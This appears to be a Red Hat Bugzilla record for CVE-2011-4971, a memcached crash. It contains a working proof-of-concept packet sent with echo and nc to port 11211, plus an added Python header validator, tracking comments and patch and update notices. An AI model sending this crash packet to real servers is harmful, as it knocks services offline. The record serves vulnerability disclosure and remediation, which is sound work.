Bug 957964 (CVE-2011-4971) - CVE-2011-4971 memcached: specially crafted packet segmentation fault
Summary: CVE-2011-4971 memcached: specially crafted packet segmentation fault
Keywords:
Status: CLOSED WONTFIX
Alias: CVE-2011-4971
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 957966 957967 957969 957970 988739
Blocks: 957971
Reported: 2013-04-30 02:07 UTC by Kurt Seifried
Modified: 2021-06-11 21:05 UTC

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2021-06-11 21:05:04 UTC
Embargoed:


Links
System ID: Novell 817781
Private: 0
Priority: None
Status: None
Summary: None
Last Updated: 2019-05-31 20:34:51 UTC

Description Kurt Seifried 2013-04-30 02:07:56 UTC
This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it: 

$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has 
changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
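
Added example (not part of the original report or of memcached's code): a Python check that decodes the 24-byte binary-protocol request header at the start of the packet in the description and rejects inconsistent length fields, as a proxy or capture filter in front of memcached could. The 1 MB limit, the function names and the second, well-formed header are assumptions constructed for illustration.

```python
import struct

# memcached binary-protocol request header: 24 bytes, network byte order.
# Fields: magic, opcode, key length, extras length, data type, vbucket,
# total body length, opaque, CAS.
HEADER = struct.Struct(">BBHBBHIIQ")
REQUEST_MAGIC = 0x80
MAX_BODY = 1024 * 1024  # assumption: default 1 MB item size limit

# First 24 bytes (the header only) of the packet quoted in the description.
REPORTED_HEADER = bytes.fromhex(
    "80" "12" "0001" "08" "00" "0000" "ffffffe8" "00000000" "0000000000000000")
# Constructed well-formed header for comparison: 3-byte key, 8 bytes of
# extras and a 5-byte value, so the total body length is 16.
GOOD_HEADER = bytes.fromhex(
    "80" "01" "0003" "08" "00" "0000" "00000010" "00000000" "0000000000000000")

def parse_header(data):
    """Decode the fixed request header into a dict of its fields."""
    if len(data) < HEADER.size:
        raise ValueError("need %d header bytes, got %d" % (HEADER.size, len(data)))
    names = ("magic", "opcode", "keylen", "extlen", "datatype",
             "vbucket", "bodylen", "opaque", "cas")
    return dict(zip(names, HEADER.unpack_from(data)))

def as_int32(value):
    """Value of an unsigned 32-bit field when held in a signed 32-bit int."""
    return value - (1 << 32) if value & 0x80000000 else value

def check_header(data, max_body=MAX_BODY):
    """Return a list of reasons to reject the request; empty means accept."""
    h = parse_header(data)
    problems = []
    if h["magic"] != REQUEST_MAGIC:
        problems.append("bad magic 0x%02x" % h["magic"])
    if h["bodylen"] > max_body:
        problems.append("body length %d exceeds limit %d" % (h["bodylen"], max_body))
    if as_int32(h["bodylen"]) < 0:
        problems.append("body length is %d as a signed 32-bit int"
                        % as_int32(h["bodylen"]))
    if h["keylen"] + h["extlen"] > h["bodylen"]:
        problems.append("key + extras longer than body")
    return problems

if __name__ == "__main__":
    for name, hdr in (("reported", REPORTED_HEADER), ("constructed", GOOD_HEADER)):
        print(name, parse_header(hdr), check_header(hdr))
```

For the reported header the check returns two reasons: the total body length field is 0xffffffe8, which exceeds the limit and is -24 when read as a signed 32-bit integer.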

Comment 1 Kurt Seifried 2013-04-30 02:09:53 UTC
Created memcached tracking bugs for this issue

Affects: fedora-all [bug 957966]

Comment 2 Kurt Seifried 2013-04-30 02:10:27 UTC
Created memcached tracking bugs for this issue

Affects: epel-5 [bug 957967]

Comment 3 Kurt Seifried 2013-04-30 02:12:22 UTC
Created memcached tracking bugs for this issue

Affects: epel-6 [bug 957969]

Comment 6 Huzaifa S. Sidhpurwala 2013-06-18 09:31:39 UTC
Proposed upstream patch (with a test):

https://code.google.com/p/memcached/issues/detail?id=192#c19

Comment 11 Miroslav Lichvar 2013-12-12 13:43:40 UTC
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks!

https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424

Comment 12 Fedora Update System 2014-02-03 02:42:28 UTC
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 13 Fedora Update System 2014-02-03 02:49:02 UTC
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 20 Product Security DevOps Team 2021-06-11 21:05:04 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2011-4971

